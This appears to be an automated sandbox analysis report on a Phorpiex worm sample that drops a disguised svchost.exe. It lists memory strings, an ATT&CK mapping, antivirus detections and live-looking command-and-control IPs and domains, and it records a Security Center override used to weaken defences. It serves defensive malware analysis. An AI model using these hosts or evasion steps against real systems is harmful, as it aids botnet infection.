Source: svchost.exe, 00000003.00000002.269189319.0000014888F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292764240.000001D371060000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.1648911205.000001A8D4D40000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.586234326.00000229F2400000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1630601797.0000019B88D40000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.959335751.000001A943EA0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.269189319.0000014888F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292764240.000001D371060000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.1648911205.000001A8D4D40000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.586234326.00000229F2400000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1630601797.0000019B88D40000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.959335751.000001A943EA0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237461258.0000000000C74000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 00000004.00000002.598475374.00000201A702A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`c
Source: svchost.exe, 0000000B.00000002.1646721991.000001C86643E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.1646846905.000001A8D4068000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.930182930.00000271F922A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000003.00000002.269189319.0000014888F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292764240.000001D371060000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.1648911205.000001A8D4D40000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.586234326.00000229F2400000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1630601797.0000019B88D40000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.959335751.000001A943EA0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	API call chain: ExitProcess graph end node	graph_0-938
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	API call chain: ExitProcess graph end node	graph_0-956
Source: C:\16642873124159\svchost.exe	API call chain: ExitProcess graph end node	graph_1-938
Source: C:\16642873124159\svchost.exe	API call chain: ExitProcess graph end node	graph_1-956

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Code function: 0_2_008B17D0 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,

0_2_008B17D0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\16642873124159\svchost.exe	Network Connect: 185.215.113.10 80	Jump to behavior
Source: C:\16642873124159\svchost.exe	Network Connect: 212.83.168.196 80	Jump to behavior
Source: C:\16642873124159\svchost.exe	Network Connect: 64.70.19.203 80	Jump to behavior

Source: svchost.exe, 00000001.00000002.1647735831.0000000001150000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1647652669.000002372E790000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000001.00000002.1647735831.0000000001150000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1647652669.000002372E790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000001.00000002.1647735831.0000000001150000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1647652669.000002372E790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000001.00000002.1647735831.0000000001150000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1647652669.000002372E790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: memset,GetLocaleInfoA,strcmp,		0_2_008B28E0
Source: C:\16642873124159\svchost.exe	Code function: memset,GetLocaleInfoA,strcmp,		1_2_00AB28E0

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\16642873124159\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiSpywareOverride

Jump to behavior

Source: svchost.exe, 00000025.00000003.827830350.000001A944160000.00000004.00000001.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000011.00000002.1646868106.0000019965A29000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.1646899923.0000019965A3D000.00000004.00000001.sdmp	Binary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Remote Access Functionality:

Yara detected Phorpiex

Show sources

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 68, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6392, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1720, type: MEMORY
Source: Yara match	File source: Process Memory Space: Br6Pmt0MiZ.exe PID: 5220, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4424, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	Peripheral Device Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API11	Registry Run Keys / Startup Folder1	Process Injection12	Obfuscated Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Software Packing1	Security Account Manager	System Information Discovery31	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Security Software Discovery141	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection12	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Network Configuration Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Br6Pmt0MiZ.exe	87%	Virustotal		Browse
Br6Pmt0MiZ.exe	47%	Metadefender		Browse
Br6Pmt0MiZ.exe	90%	ReversingLabs	Win32.Worm.Phorpiex
Br6Pmt0MiZ.exe	100%	Avira	TR/Downloader.Gen
Br6Pmt0MiZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\16642873124159\svchost.exe	100%	Avira	TR/Downloader.Gen
C:\16642873124159\svchost.exe	100%	Joe Sandbox ML
C:\16642873124159\svchost.exe	47%	Metadefender		Browse
C:\16642873124159\svchost.exe	90%	ReversingLabs	Win32.Worm.Phorpiex

Unpacked PE Files

Source	Detection	Scanner	Label	Download
18.2.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
18.0.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
6.2.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
0.0.Br6Pmt0MiZ.exe.8b0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
1.0.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
1.2.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
0.2.Br6Pmt0MiZ.exe.8b0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
6.0.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
8.0.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File
8.2.svchost.exe.ab0000.0.unpack	100%	Avira	TR/Downloader.Gen	Download File

Domains

Source	Detection	Scanner	Link
tldrbox.top	12%	Virustotal	Browse
thaus.ws	2%	Virustotal	Browse
tsrv5.top	6%	Virustotal	Browse
tsrv3.ru	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://tsrv4.ws/	0%	Avira URL Cloud	safe
http://Passport.NET/tbpose	0%	Avira URL Cloud	safe
http://zzruuoooshfrohu.su/5http://zzruuoooshfrohu.su/6	0%	Avira URL Cloud	safe
http://185.215.113.10/2http://185.215.113.10/1	0%	Avira URL Cloud	safe
http://185.215.113.10/6tsrv4.ws	0%	Avira URL Cloud	safe
http://api.wipmania.com/a	0%	Avira URL Cloud	safe
http://185.215.113.10/1H	0%	Avira URL Cloud	safe
http://tsrv4.ws/6	0%	Avira URL Cloud	safe
http://tsrv4.ws/5	0%	Avira URL Cloud	safe
http://185.215.113.10/	0%	Avira URL Cloud	safe
http://tsrv4.ws/4	0%	Avira URL Cloud	safe
http://tsrv4.ws/3	100%	Avira URL Cloud	phishing
http://tsrv4.ws/2	0%	Avira URL Cloud	safe
http://tsrv4.ws/1	0%	Avira URL Cloud	safe
http://tsrv3.ru/	0%	Avira URL Cloud	safe
http://api.wipmania.com/&4	0%	Avira URL Cloud	safe
http://api.wipmania.com/UAMozilla/5.0	0%	Avira URL Cloud	safe
http://185.215.113.10/5http://185.215.113.10/6http://185.215.113.10/6	0%	Avira URL Cloud	safe
http://tha.215.113.10/1	0%	Avira URL Cloud	safe
http://passport.net/tb	0%	Avira URL Cloud	safe
http://185.215.113.10/6u/6	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://thaus.ws/	0%	Avira URL Cloud	safe
http://tldrbox.top/2	0%	Avira URL Cloud	safe
http://tldrbox.top/1	0%	Avira URL Cloud	safe
http://tldrbox.top/4	0%	Avira URL Cloud	safe
http://tldrbox.top/3	0%	Avira URL Cloud	safe
http://schemas.microsoft.0G	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
http://zzruuoooshfrohu.su/4http://zzruuoooshfrohu.su/6	0%	Avira URL Cloud	safe
http://185.215.113.10/4http://185.215.113.10/3http://185.215.113.10/3http://185.215.113.10/5	0%	Avira URL Cloud	safe
http://185.215.113.10/1http://185.215.113.10/6	0%	Avira URL Cloud	safe
http://api.wipmania.com	0%	Avira URL Cloud	safe
http://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/htt	0%	Avira URL Cloud	safe
http://zzruuoooshfrohu.su/	0%	Avira URL Cloud	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbc48496-2624191407-3283318427-1255436723	0%	Avira URL Cloud	safe
http://universalstore.streaming.mediaservicendow	0%	Avira URL Cloud	safe
http://api.wipmania.com/s%	0%	Avira URL Cloud	safe
http://tsrv3.ru/4	0%	Avira URL Cloud	safe
http://tsrv3.ru/5	0%	Avira URL Cloud	safe
http://tldrbox.top/	0%	Avira URL Cloud	safe
http://tsrv3.ru/6	0%	Avira URL Cloud	safe
http://tsrv5.top/	0%	Avira URL Cloud	safe
http://tldrbox.top/6	0%	Avira URL Cloud	safe
http://tldrbox.top/5	0%	Avira URL Cloud	safe
http://tsrv3.ru/1	0%	Avira URL Cloud	safe
http://tsrv3.ru/2	0%	Avira URL Cloud	safe
http://tsrv3.ru/3	0%	Avira URL Cloud	safe
http://185.215.113.10/6http://185.215.113.10/2	0%	Avira URL Cloud	safe
http://zzruuoooshfrohu.su/5	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tldrbox.top	185.215.113.10	true	true	12%, Virustotal, Browse	unknown
thaus.ws	64.70.19.203	true	true	2%, Virustotal, Browse	unknown
tsrv5.top	127.0.0.1	true	false	6%, Virustotal, Browse	unknown
tsrv3.ru	127.0.0.1	true	false	11%, Virustotal, Browse	unknown
zzruuoooshfrohu.su	185.215.113.10	true	true		unknown
tsrv4.ws	185.215.113.10	true	true		unknown
api.wipmania.com	212.83.168.196	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdP	svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhod	svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000F.00000003.309284511.00000222DD050000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdTokenT	svchost.exe, 00000023.00000002.1629264372.0000019B88913000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	false		high
http://tsrv4.ws/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tbpose	svchost.exe, 00000023.00000002.1631119861.0000019B89019000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd/04/xmle	svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	false		high
http://zzruuoooshfrohu.su/5http://zzruuoooshfrohu.su/6	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp	false		high
http://185.215.113.10/2http://185.215.113.10/1	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/6tsrv4.ws	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hulu.com/terms	svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	false		high
http://api.wipmania.com/a	Br6Pmt0MiZ.exe, 00000000.00000002.237461258.0000000000C74000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/1H	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tsrv4.ws/6	svchost.exe, 00000001.00000003.819055029.000000000086C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tsrv4.ws/5	svchost.exe, 00000001.00000003.773788185.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA	svchost.exe, 00000023.00000003.814580553.0000019B8892E000.00000004.00000001.sdmp	false		high
http://tsrv4.ws/4	svchost.exe, 00000001.00000003.773788185.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.728521022.000000000086C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tsrv4.ws/3	svchost.exe, 00000001.00000003.682340835.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdP	svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	false		high
http://tsrv4.ws/2	svchost.exe, 00000001.00000003.637078208.000000000086C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tsrv4.ws/1	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	false		high
http://tsrv3.ru/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
https://en.help.roblox.com/hc/en-us	svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	false		high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplementa	svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000F.00000002.309600013.00000222DD013000.00000004.00000001.sdmp	false		high
http://api.wipmania.com/&4	Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://api.wipmania.com/UAMozilla/5.0	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/scs-cbc	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	false		high
http://185.215.113.10/5http://185.215.113.10/6http://185.215.113.10/6	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000F.00000003.309334716.00000222DD046000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	false		high
https://account.live.com/msangcwam	svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	false		high
http://tha.215.113.10/1	svchost.exe, 00000001.00000002.1647181192.000000000082C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.g5e.com/G5_End_User_License_Supplementa8	svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	false		high
http://passport.net/tb	svchost.exe, 00000023.00000002.1631041712.0000019B89002000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/6u/6	svchost.exe, 00000001.00000002.1646311546.00000000001B9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570181616.00000229F1D25000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000F.00000002.309600013.00000222DD013000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	false		high
http://thaus.ws/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://tldrbox.top/2	svchost.exe, 00000001.00000003.1207227370.0000000000885000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://tldrbox.top/1	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.hulu.com/privacy	svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80601igning	svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	false		high
http://tldrbox.top/4	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://tldrbox.top/3	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	false		high
http://schemas.microsoft.0G	svchost.exe, 00000023.00000002.1628003348.0000019B8802A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/02/scsis-200	svchost.exe, 00000023.00000003.1114489682.0000019B88951000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000F.00000003.309284511.00000222DD050000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd05/soa	svchost.exe, 00000023.00000003.816342544.0000019B88954000.00000004.00000001.sdmp	false		high
http://zzruuoooshfrohu.su/4http://zzruuoooshfrohu.su/6	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trustnce	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000F.00000002.309612750.00000222DD029000.00000004.00000001.sdmp	false		high
http://185.215.113.10/4http://185.215.113.10/3http://185.215.113.10/3http://185.215.113.10/5	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/1http://185.215.113.10/6	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000F.00000002.309651963.00000222DD04C000.00000004.00000001.sdmp	false		high
